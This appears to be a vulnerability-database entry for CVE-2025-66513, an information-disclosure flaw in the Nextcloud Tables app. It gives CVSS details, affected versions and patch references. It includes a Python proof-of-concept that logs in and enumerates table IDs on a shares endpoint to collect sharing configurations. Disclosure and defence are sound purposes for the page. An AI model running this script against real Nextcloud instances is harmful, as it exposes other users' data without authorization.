Security Vulnerability Report
CVE-2025-66513 CVSS 4.3 MEDIUM

CVE-2025-66513

Published: 2025-12-05 18:15:57
Last Modified: 2025-12-09 19:32:46

Description

Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.9, 0.9.6, and 1.0.1, the information about which table (numeric ID) is shared with which groups or users, and with which permissions, was not limited to privileged users. This vulnerability is fixed in 0.8.9, 0.9.6, and 1.0.1.

CVSS Details

CVSS Score
4.3 (Secondary metric); 5.3 (Primary metric)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N (Secondary metric)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (Primary metric)
Weakness
CWE-639

Configurations (Affected Products)

cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* (versions >= 0.6.0 and < 0.8.9) - VULNERABLE
cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* (versions >= 0.9.0 and < 0.9.6) - VULNERABLE
cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* (versions >= 1.0.0 and < 1.0.1) - VULNERABLE
Nextcloud Tables 0.6.0 up to but not including 0.8.9
Nextcloud Tables 0.9.0 up to but not including 0.9.6
Nextcloud Tables 1.0.0 up to but not including 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-66513 PoC - Nextcloud Tables Information Disclosure
# Target: Nextcloud instance with Tables app installed
# This PoC demonstrates how an authenticated user can access
# table sharing information without proper authorization

TARGET_URL = "https://vulnerable-nextcloud.example.com"
USERNAME = "[email protected]"
PASSWORD = "password123"


def exploit():
    """
    Exploit for CVE-2025-66513: Information disclosure via
    unauthorized access to table sharing configuration
    """
    session = requests.Session()

    # Step 1: Authenticate to Nextcloud
    login_url = f"{TARGET_URL}/index.php/login"
    login_data = {"user": USERNAME, "password": PASSWORD}
    response = session.post(login_url, data=login_data)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return
    print("[+] Authenticated successfully")

    # Step 2: Enumerate table IDs and fetch sharing information
    # The vulnerable endpoint exposes table sharing configuration
    # without proper authorization checks
    for table_id in range(1, 100):
        vulnerable_endpoint = (
            f"{TARGET_URL}/ocs/v2.php/apps/tables/api/v1/tables/{table_id}/shares"
        )
        headers = {"OCS-APIREQUEST": "true", "Accept": "application/json"}
        response = session.get(vulnerable_endpoint, headers=headers)
        if response.status_code == 200:
            try:
                data = response.json()
                if data.get("ocs") and data["ocs"].get("data"):
                    shares = data["ocs"]["data"]
                    if shares:
                        print(f"\n[+] Table ID {table_id} sharing info:")
                        print(json.dumps(shares, indent=2))
            except json.JSONDecodeError:
                pass

    print("\n[!] Information disclosure complete")
    print("[!] Collected table sharing configurations without authorization")


if __name__ == "__main__":
    exploit()

References

https://github.com/nextcloud/security-advisories/security/advisories/GHSA-2cwj-qp49-4xfw (Patch, Vendor Advisory)
https://github.com/nextcloud/tables/commit/b92b9560b1e70a02b103a7aeb9e22e2ab5231873 (Patch)
https://github.com/nextcloud/tables/pull/2148 (Issue Tracking, Patch)
https://hackerone.com/reports/3334165 (Issue Tracking, Vendor Advisory)

Raw JSON Data
